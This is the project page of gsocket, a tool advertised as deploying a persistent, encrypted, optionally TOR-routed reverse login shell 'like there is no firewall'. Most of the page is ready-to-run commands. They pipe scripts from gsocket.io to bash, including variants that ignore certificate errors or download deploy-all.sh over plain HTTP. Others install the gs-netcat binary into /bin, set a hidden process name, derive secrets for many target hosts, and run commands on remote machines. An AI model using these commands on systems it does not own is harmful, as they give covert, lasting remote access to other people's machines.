Connect like there is no firewall. Securely.
Deploy a reverse login shell with a single command (fully automated) - and access the shell remotely - encrypted - and via TOR if you like.
This must be the quickest way to access a system – anonymous
Use either one of these three commands to install, uninstall, and access:
Install
bash -c "$(curl -fsSL gsocket.io/x)"
Uninstall
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
Access
S="ExampleSecretChangeMe" bash -c "$(curl -fsSL gsocket.io/x)"
Install
bash -c "$(wget --no-verbose -O- gsocket.io/x)"
Uninstall
GS_UNDO=1 bash -c "$(wget --no-verbose -O- gsocket.io/x)"
Access
S="ExampleSecretChangeMe" bash -c "$(wget --no-verbose -O- gsocket.io/x)"
Windows user need to manually install the binary. Contact us if you like to write a powershell deploy script.
Deploy on a host
Log in to the host from your workstation
Ignore SSL / Certificate warnings
bash -c "$(curl -fsSLk gsocket.io/x)"
Deploy with a predefined secret
X=ExampleSecretChangeMe bash -c "$(curl -fsSL gsocket.io/x)"
Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP
curl -fsSL http://nossl.segfault.net/deploy-all.sh && \
bash deploy-all.sh
Ignore SSL / Certificate warnings
bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"
Deploy with a predefined secret
X=ExampleSecretChangeMe bash -c "$(wget --no-verbose -O- gsocket.io/x)"
Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP
wget --no-hsts http://nossl.segfault.net/deploy-all.sh && \
bash deploy-all.sh
Useful environment variables:
S= | Connect to a system (or use gs-netcat -s <secret> -il ). |
X= | Set a predefined secret for the installation (X like in inXstallation). |
GS_NOINST=1 | Only start but without installing (will not survive a reboot). |
GSOCKET_ARGS= | Use additonal arguments. Most often used to force TOR in combination with S=, e.g. GSOCKET_ARGS="-T" S=<secret> bash -c "$(curl -fsSLk gsocket.io/x) . |
GS_DSTDIR= | Set the installation directory. The default is to pick the most suitable automatically. Use find . -type d -writable . |
GS_URL_BASE= | Use URL for static binaries. The default is https://github.com/hackerschoice/binary/raw/main/gsocket/bin/. |
GS_OSARCH= | Force architecture. The default is to pick the most suitable automatically. |
GS_DEBUG=1 | Verbose output and other debug related settings. Often used together with GS_DEBUG=1 GS_NOSTART=1 GS_NOINST=1 bash -c "$(curl -fsSL gsocket.io/x)" . |
GS_HIDDEN_NAME= | Use a custom hidden process name. |
TMPDIR= | Use a custom temporary directory. Try TMPDIR=$(pwd) |
If all fails:
Download the static binary from https://github.com/hackerschoice/binary/tree/main/gsocket/bin (likely gs-netcat_x86_64-alpine.tar.gz) and extract and start gs-netcat manually:
curl -fsSL https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-alpine.tar.gz | tar xz -C /bin gs-netcat
SECRET=$(/bin/gs-netcat -g)
GSOCKET_ARGS="-liD -s $SECRET" /bin/gs-netcat
echo "Connect with: gs-netcat -s $SECRET -i"
wget --no-check-certificate -qO- https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-alpine.tar.gz | tar xz -C /bin gs-netcat
SECRET=$(/bin/gs-netcat -g)
GSOCKET_ARGS="-liD -s $SECRET" /bin/gs-netcat
echo "Connect with: gs-netcat -s $SECRET -i"
Remembering many secrets from many deployments is cumbersome. It is easier to remember just one MASTER-SEED and derive the SECRET from the target’s hostname. The following script generates a secure SECRET based on a single MASTER-SEED and the target’s hostname.
# cut & paste this into your shell on your workstation or add to ~/.bashrc
gssec()
{
str="$(echo "${GS_SEED:?}$1" | sha512sum | base64 | tr -d -c a-z0-9)"
str="${str:0:22}"
echo "DEPLOY: X=${str}"' bash -c "$(curl -fsSL gsocket.io/x)"'
echo "ACCESS: S=${str}"' bash -c "$(curl -fsSL gsocket.io/x)"'
echo "ACCESS: gs-netcat -s ${str} -i"
}
# Pick a STRONG master seed:
[[ -z $GS_SEED ]] && GS_SEED=MySuperStrongMasterSeed
# Generate a SECRET based on the SEED and 'alice.com'
$ gssec alice.com # You only need to know "alice.com" to connect.
# Output from above's command:
DEPLOY: X=2m1zidi1zkkmxjjj0z0jlj bash -c "$(curl -fsSL gsocket.io/x)"
ACCESS: S=2m1zidi1zkkmxjjj0z0jlj bash -c "$(curl -fsSL gsocket.io/x)"
ACCESS: gs-netcat -s 2m1zidi1zkkmxjjj0z0jlj -i
# cut & paste this into your shell on your workstation or add to ~/.bashrc
gssec()
{
str="$(echo "${GS_SEED:?}$1" | sha512sum | base64 | tr -d -c a-z0-9)"
str="${str:0:22}"
echo "DEPLOY: X=${str}"' bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"'
echo "ACCESS: S=${str}"' bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"'
echo "ACCESS: gs-netcat -s ${str} -i"
}
# Pick a STRONG master seed:
[[ -z $GS_SEED ]] && GS_SEED=MySuperStrongMasterSeed
# Generate a SECRET based on the SEED and 'alice.com'
$ gssec alice.com # You only need to know "alice.com" to connect.
# Output from above's command:
DEPLOY: X=2m1zidi1zkkmxjjj0z0jlj bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"
ACCESS: S=2m1zidi1zkkmxjjj0z0jlj bash -c "$(wget --no-check-certificate -qO- gsocket.io/x)"
ACCESS: gs-netcat -s 2m1zidi1zkkmxjjj0z0jlj -i
Execute a single command (e.g. id
) on a remote system:
echo 'id; exit; __START' | gs-netcat -s ExampleSecretChangeMe 2>/dev/null | sed -n '/__START/,$p' | tail +2
Get Involved. We are looking for volunteers to work on the website and a logo and to discuss new ideas. Join us on telegram.